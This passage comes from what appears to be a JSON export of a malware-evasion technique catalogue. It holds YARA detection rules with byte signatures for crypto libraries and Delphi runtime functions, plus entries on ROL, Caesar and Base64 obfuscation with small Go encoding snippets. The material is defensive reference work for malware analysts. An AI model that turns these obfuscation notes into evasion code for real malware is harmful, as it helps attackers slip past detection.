34 20 00 E8 ?? ?? ?? ?? 8B 8C 24 B4 00 00 00 8B 84 24 A8 00 00 00 51 8B 8C 24 A8 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 44 24 0C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 7C 24 1C E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 8C 24 B0 00 00 00 53 51 E8 ?? ?? ?? ?? 8D 94 24 B8 00 00 00 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 F8 00 00 00 8D 84 24 ?? 00 00 00 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 83 C4 24 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_Big_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl Big constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F1 6A 00 E8 ?? ?? ?? ?? 83 C4 04 89 06 8B C6 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_mirvar\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirvar\"\r\n\tstrings:\r\n\t\t$c0 = { 56 E8 ?? ?? ?? ?? 8B 88 18 02 00 00 85 C9 74 04 33 C0 5E C3 8B 88 8C 00 00 00 85 C9 75 0E 6A 12 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5E C3 8B 80 38 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F0 83 C4 08 85 F6 75 02 5E C3 8D 46 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 08 85 C0 74 0A 56 50 E8 ?? ?? ?? ?? 83 C4 08 8B C6 5E C3 }\r\n\t\t$c1 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 2C 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 40 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 46 18 6A 01 8D 0C 85 0C 00 00 00 51 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B D0 8B C8 83 E2 03 2B CA 83 C1 08 89 08 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\t\t$c2 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 86 A4 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Miracl_mirsys_init\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirsys init\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 57 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 DB A3 ?? ?? ?? ?? 3B C3 75 06 5F 5D 33 C0 5B C3 89 58 1C A1 ?? ?? ?? ?? BD 01 00 00 00 89 58 20 A1 ?? ?? ?? ?? 8B 50 1C 42 89 50 1C A1 ?? ?? ?? ?? 8B 48 1C C7 44 88 20 1D 00 00 00 8B 15 ?? ?? ?? ?? 89 9A 14 02 00 00 A1 ?? ?? ?? ?? 89 98 70 01 00 00 8B 0D ?? ?? ?? ?? 89 99 78 01 00 00 8B 15 ?? ?? ?? ?? 89 9A 98 01 00 00 A1 ?? ?? ?? ?? 89 58 14 8B 44 24 14 3B C5 0F 84 6C 05 00 00 3D 00 00 00 80 0F 87 61 05 00 00 50 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n/* //gives many false positives sorry Storm Shadow\r\nrule x509_public_key_infrastructure_cert\r\n{\tmeta:\r\n\t\tdesc = \"X.509 PKI Certificate\"\r\n\t\text = \"crt\"\r\n\tstrings:\r\n\t\t$c0 = { 30 82 ?? ?? 30 82 ?? ?? }\r\n\tcondition: \r\n\t\t$c0\r\n}\r\n\r\nrule pkcs8_private_key_information_syntax_standard\r\n{\tmeta:\r\n\t\tdesc = \"Found PKCS #8: Private-Key\"\r\n\t\text = \"key\"\r\n\tstrings: \r\n\t\t$c0 = { 30 82 ?? ?? 02 01 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n*/\r\n\r\nrule BASE64_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Base64 table\"\r\n\t\tdate = \"2015-07\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2015-08\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 31 DB 69 93 ?? ?? ?? ?? 05 84 08 08 42 89 93 ?? ?? ?? ?? F7 E2 89 D0 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 8B 05 ?? ?? ?? ?? 69 C0 05 84 08 08 83 C0 01 89 05 ?? ?? ?? ?? 8B C9 8B C0 48 0F AF C8 48 C1 E9 20 89 C8 C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_RandomRange {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for RandomRange function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F2 8B D8 3B F3 7D 0E 8B C3 2B C6 E8 ?? ?? ?? ?? 03 C6 5E 5B C3 8B C6 2B C3 E8 ?? ?? ?? ?? 03 C3 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_FormShow {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Form.Show function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 B2 01 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 89 D9 B2 01 E8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_CompareCall {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Compare string function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 89 C6 89 D7 39 D0 0F 84 8F 00 00 00 85 F6 74 68 85 FF 74 6B 8B 46 FC 8B 57 FC 29 D0 77 02 01 C2 52 C1 EA 02 74 26 8B 0E 8B 1F 39 D9 75 58 4A 74 15 8B 4E 04 8B 5F 04 39 D9 75 4B 83 C6 08 83 C7 08 4A 75 E2 EB 06 83 C6 04 83 C7 04 5A 83 E2 03 74 22 8B 0E 8B 1F 38 D9 75 41 4A 74 17 38 FD 75 3A 4A 74 10 81 E3 00 00 FF 00 81 E1 00 00 FF 00 39 D9 75 27 01 C0 EB 23 8B 57 FC 29 D0 EB 1C 8B 46 FC 29 D0 EB 15 5A 38 D9 75 10 38 FD 75 0C C1 E9 10 C1 EB 10 38 D9 75 02 38 FD 5F 5E 5B C3 }\r\n\t\t//newer delphi\r\n\t\t$c1 = { 39 D0 74 30 85 D0 74 22 8B 48 FC 3B 4A FC 75 24 01 C9 01 C8 01 CA F7 D9 53 8B 1C 01 3B 1C 11 75 07 83 C1 04 78 F3 31 C0 5B C3}\r\n\t\t//x64\r\n\t\t$c2 = { 41 56 41 55 57 56 53 48 83 EC 20 48 89 D3 48 3B CB 75 05 48 33 C0 EB 74 48 85 C9 75 07 8B 43 FC F7 D8 EB 68 48 85 DB 75 05 8B 41 FC EB 5E 8B 79 FC 44 8B 6B FC 89 FE 41 3B F5 7E 03 44 89 EE E8 ?? ?? ?? ?? 49 89 C6 48 89 D9 E8 ?? ?? ?? ?? 48 89 C1 85 F6 7E 30 41 0F B7 06 0F B7 11 2B C2 85 C0 75 29 83 FE 01 74 1E 41 0F B7 46 02 0F B7 51 02 2B C2 85 C0 75 15 49 83 C6 04 48 83 C1 04 83 EE 02 85 F6 7F D0 90 8B C7 41 2B C5 48 83 C4 20 5B 5E 5F 41 5D 41 5E C3 }\r\n \tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_Copy {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Copy function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 85 C0 74 2D 8B 58 FC 85 DB 74 26 4A 7C 1B 39 DA 7D 1F 29 D3 85 C9 7C 19 39 D9 7F 11 01 C2 8B 44 24 08 E8 ?? ?? ?? ?? EB 11 31 D2 EB E5 89 D9 EB EB 8B 44 24 08 E8 ?? ?? ?? ?? 5B C2 04 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 44 89 C0 48 33 C9 48 85 D2 74 03 8B 4A FC 83 F8 01 7D 05 48 33 C0 EB 09 83 E8 01 3B C1 7E 02 89 C8 45 85 C9 7D 05 48 33 C9 EB 0A 2B C8 41 3B C9 7E 03 44 89 C9 49 89 D8 48 63 C0 48 8D 14 42 89 C8 4C 89 C1 41 89 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_IntToStr {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for IntToStr function\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 00 FF FF FF 53 56 8B F2 8B D8 FF 75 0C FF 75 08 8D 85 00 FF FF FF E8 ?? ?? ?? ?? 8D 95 00 FF FF FF 8B C6 E8 ?? ?? ?? ?? EB 0E 8B 0E 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 06 E8 ?? ?? ?? ?? 33 D2 8A D3 3B C2 72 E3 5E 5B 8B E5 5D C2 08 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 85 D2 7D 10 48 89 D9 48 F7 DA 41 B0 01 E8 ?? ?? ?? ?? EB 0B 48 89 D9 4D 33 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Delphi_StrToInt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for StrToInt function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 83 C4 F4 8B D8 8B D4 8B C3 E8 ?? ?? ?? ?? 8B F0 83 3C 24 00 74 19 89 5C 24 04 C6 44 24 08 0B 8D 54 24 04 A1 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 8B C6 83 C4 0C 5E 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 55 56 53 48 83 EC 40 48 8B EC 48 89 CB 48 89 D9 48 8D 55 3C E8 ?? ?? ?? ?? 89 C6 83 7D 3C 00 74 1B 48 89 5D 20 C6 45 28 11 48 8B 0D ?? ?? ?? ?? 48 8D 55 20 4D 33 C0 E8 ?? ?? ?? ?? 89 F0 48 8D 65 40 5B 5E 5D C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_DecodeDate {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DecodeDate (DecodeDateFully) function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 89 4D F4 89 55 F8 89 45 FC 8B 5D 08 FF 75 10 FF 75 0C 8D 45 E8 E8 ?? ?? ?? ?? 8B 4D EC 85 C9 7F 24 8B 45 FC 66 C7 00 00 00 8B 45 F8 66 C7 00 00 00 8B 45 F4 66 C7 00 00 00 66 C7 03 00 00 33 D2 E9 F2 00 00 00 8B C1 BE 07 00 00 00 99 F7 FE 42 66 89 13 49 66 BB 01 00 81 F9 B1 3A 02 00 7C 13 81 E9 B1 3A 02 00 66 81 C3 90 01 81 F9 B1 3A 02 00 7D ED 8D 45 F2 50 8D 45 F0 66 BA AC 8E 91 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 AC 8E 66 6B 45 F0 64 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA B5 05 E8 ?? ?? ?? ?? 66 8B 45 F0 C1 E0 02 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA 6D 01 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 6D 01 66 03 5D F0 8B C3 E8 ?? ?? ?? ?? 8B D0 33 C0 8A C2 8D 04 40 8D 34 C5 ?? ?? ?? ?? 66 B8 01 00 0F B7 C8 66 8B 4C 4E FE 66 89 4D F0 66 8B 4D F2 66 3B 4D F0 72 0B 66 8B 4D F0 66 29 4D F2 40 EB DF 8B 4D FC 66 89 19 8B 4D F8 66 89 01 66 8B 45 F2 40 8B 4D F4 66 89 01 8B C2 5E 5B 8B E5 5D C2 0C 00 }\r\n\t\t//x64\r\n\t\t$c1 = { 55 41 55 57 56 53 48 83 EC 30 48 8B EC 48 89 D3 4C 89 C6 4C 89 CF E8 ?? ?? ?? ?? 48 8B C8 48 C1 E9 20 85 C9 7F 23 66 C7 03 00 00 66 C7 06 00 00 66 C7 07 00 00 48 8B 85 80 00 00 00 66 C7 00 00 00 48 33 C0 E9 19 01 00 00 4C 8B 85 80 00 00 00 41 C7 C1 07 00 00 00 8B C1 99 41 F7 F9 66 83 C2 01 66 41 89 10 83 E9 01 66 41 BD 01 00 81 F9 B1 3A 02 00 7C 14 81 E9 B1 3A 02 00 66 41 81 C5 90 01 81 F9 B1 3A 02 00 7D EC 90 66 BA AC 8E 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E AC 8E 66 6B 45 2C 64 66 44 03 E8 0F B7 4D 2E 66 BA B5 05 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 48 0F B7 45 2C 03 C0 03 C0 66 44 03 E8 0F B7 4D 2E 66 BA 6D 01 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E 6D 01 66 44 03 6D 2C 44 89 E9 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F B6 D0 48 8D 14 52 48 8D 14 D1 66 B9 01 00 4C 0F B7 C1 4E 0F B7 44 42 FE 66 44 89 45 2C 4C 0F B7 45 2E 66 44 3B 45 2C 72 10 4C 0F B7 45 2C 66 44 29 45 2E 66 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Unknown_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 52 8B 45 08 69 15 ?? ?? ?? ?? 05 84 08 08 42 89 15 ?? ?? ?? ?? F7 E2 8B C2 5A C9 C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC6_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { A1 ?? ?? ?? ?? 69 C0 FD 43 03 00 05 C3 9E 26 00 A3 ?? ?? ?? ?? C1 F8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC8_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { E8 ?? ?? ?? ?? 8B 48 14 69 C9 FD 43 03 00 81 C1 C3 9E 26 00 89 48 14 8B C1 C1 E8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 ?? ?? ?? ?? 8B D7 8B 4D FC 8B C3 8B 38 FF 57 ?? 85 F6 75 25 8D 43 38 33 C9 BA 10 00 00 00 E8 ?? ?? ?? ?? 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 ?? 8B C3 8B 10 FF 52 ?? EB 16 8D 53 38 8B C6 B9 10 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 ?? 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael EncryptECB\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 B4 89 0C 24 8D 74 24 08 8D 7C 24 28 80 78 30 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0A 89 0F 8B CA 83 C1 04 8B 09 8D 5F 04 89 0B 8B CA 83 C1 08 8B 09 8D 5F 08 89 0B 83 C2 0C 8B 12 8D 4F 0C 89 11 8B 50 58 83 EA 02 85 D2 0F 82 3B 01 00 00 42 89 54 24 04 33 D2 8B 0F 8B DA C1 E3 02 33 4C D8 5C 89 0E 8D 4F 04 8B 09 33 4C D8 60 8D 6E 04 89 4D 00 8D 4F 08 8B 09 33 4C D8 64 8D 6E 08 89 4D 00 8D 4F 0C 8B 09 33 4C D8 68 8D 5E 0C 89 0B 33 C9 8A 0E 8D 0C 8D }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_BLOWFISH_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 8B F2 8B F8 8B CF B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 8B 10 FF 52 34 8B C6 E8 ?? ?? ?? ?? 50 8B C6 E8 ?? ?? ?? ?? 8B D0 8B C3 59 8B 30 FF 56 3C 8B 43 3C 85 C0 79 03 83 C0 07 C1 F8 03 E8 ?? ?? ?? ?? 8B F0 8B D6 8B C3 8B 08 FF 51 40 8B 47 40 8B 6B 3C 3B C5 7D 0F 6A 00 8B C8 8B D6 8B C7 8B 38 FF 57 30 EB 0D 6A 00 8B D6 8B CD 8B C7 8B 38 FF 57 30 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 B9 FF 00 00 00 E8 ?? ?? ?? ?? 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5D 5F 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DCP_BLOWFISH_EncryptCBC {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish EncryptCBC\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 57 89 4D F8 89 55 FC 8B D8 80 7B 34 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D 08 85 FF 79 03 83 C7 07 C1 FF 03 85 FF 7E 56 BE 01 00 00 00 6A 08 8B 45 FC 8B D6 4A C1 E2 03 03 C2 8D 4D F0 8D 53 54 E8 ?? ?? ?? ?? 8D 4D F0 8D 55 F0 8B C3 E8 ?? ?? ?? ?? 8B 55 F8 8B C6 48 C1 E0 03 03 D0 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 8D 53 54 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 46 4F 75 AF 8B 75 08 81 E6 07 00 00 80 79 05 4E 83 CE F8 46 85 F6 74 26 8D 4D F0 8D 53 54 8B C3 E8 ?? ?? ?? ?? 56 8B 4D F8 03 4D 08 2B CE 8B 55 FC 03 55 08 2B D6 8D 45 F0 E8 ?? ?? ?? ?? 8D 45 F0 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_DES_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des Init\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 FE F9 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 5C 85 F6 75 25 8D 43 38 33 C9 BA 08 00 00 00 E8 F3 A9 FA FF 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 6C 8B C3 8B 10 FF 52 48 EB 16 8D 53 38 8B C6 B9 08 00 00 00 E8 6E A7 FA FF 8B C3 8B 10 FF 52 48 5F 5E 5B 59 5D C2 04 00 }\r\n\t\t$c1 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 EE D4 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 74 85 F6 75 2B 8D 43 40 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 8D 4B 40 8D 53 40 8B C3 8B 30 FF 96 84 00 00 00 8B C3 8B 10 FF 52 58 EB 16 8D 53 40 8B C6 B9 08 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 58 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule DCP_DES_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des EncryptECB\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 53 80 78 ?? 00 75 16 B9 ?? ?? ?? 00 B2 01 A1 ?? ?? ?? 00 E8 ?? ?? ?? FF E8 ?? ?? ?? FF 8D 58 ?? 53 E8 ?? ?? FF FF 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}"
                }
            ]
        },
        {
            "name": "ROL",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "Similar to Cesar cipher, which are simple rotation of the original strings.",
            "resources": "https://blog.malwarebytes.com/threat-analysis/2013/03/obfuscation-malwares-best-friend/",
            "tags": "rol",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Caesar Cipher",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "The Caesar Cipher is a simply encoding algorithm used during the Roman Empire to hide secret message.",
            "resources": "https://blog.malwarebytes.com/threat-analysis/2013/03/obfuscation-malwares-best-friend/",
            "tags": "Caesar",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/4/",
                    "author": "https://search.unprotect.it/api/snippet_authors/2/",
                    "technique": "https://search.unprotect.it/api/techniques/97/",
                    "description": "",
                    "plain_code": "package main\r\n\r\nimport (\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc cipher(text string, direction int) string {\r\n\r\n        shift, offset := rune(3), rune(26)\r\n\trunes := []rune(text)\r\n\r\n        for index, char := range runes {\r\n\t\tswitch direction {\r\n\t\tcase -1: // encoding\r\n\t\t\tif char >= 'a'+shift && char <= 'z' ||\r\n\t\t\t\tchar >= 'A'+shift && char <= 'Z' {\r\n\t\t\t\tchar = char - shift\r\n\t\t\t} else if char >= 'a' && char < 'a'+shift ||\r\n\t\t\t\tchar >= 'A' && char < 'A'+shift {\r\n\t\t\t\tchar = char - shift + offset\r\n\t\t\t}\r\n\t\tcase +1: // decoding\r\n\t\t\tif char >= 'a' && char <= 'z'-shift ||\r\n\t\t\t\tchar >= 'A' && char <= 'Z'-shift {\r\n\t\t\t\tchar = char + shift\r\n\t\t\t} else if char > 'z'-shift && char <= 'z' ||\r\n\t\t\t\tchar > 'Z'-shift && char <= 'Z' {\r\n\t\t\t\tchar = char + shift - offset\r\n\t\t\t}\r\n\t\t}\r\n\t\trunes[index] = char\r\n\t}\r\n\treturn string(runes)\r\n}\r\n\r\nfunc encode(text string) string { return cipher(text, -1) }\r\nfunc decode(text string) string { return cipher(text, +1) }\r\n\r\nfunc main() {\r\n\tsec := os.Args[1]\r\n        fmt.Println(\"[+] Clear text: \" + sec)\r\n\tencoded := encode(sec)\r\n\tfmt.Println(\"[+] Encoded: \" + encoded)\r\n\tdecoded := decode(encoded)\r\n\tfmt.Println(\"[+] Decoded: \" + decoded)\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Base64",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "Base64 is used to represent binary data in an ASCII string. This is a simple encoding and commonly found into malware.",
            "resources": "https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0",
            "tags": "base64",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/4/",
                    "author": "https://search.unprotect.it/api/snippet_authors/2/",
                    "technique": "https://search.unprotect.it/api/techniques/96/",
                    "description": "",
                    "plain_code": "package main\r\n\r\nimport (\r\n    \"encoding/base64\"\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc main() {\r\n\r\n    arg1 := os.Args[1]\r\n\r\n    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))\r\n    fmt.Println(encoded)\r\n\r\n    decoded, err := base64.StdEncoding.DecodeString(encoded)\r\n    if err != nil {\r\n        panic(\"error\")\r\n    }\r\n    fmt.Println(string(decoded))\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
                    "name": "base64_download",
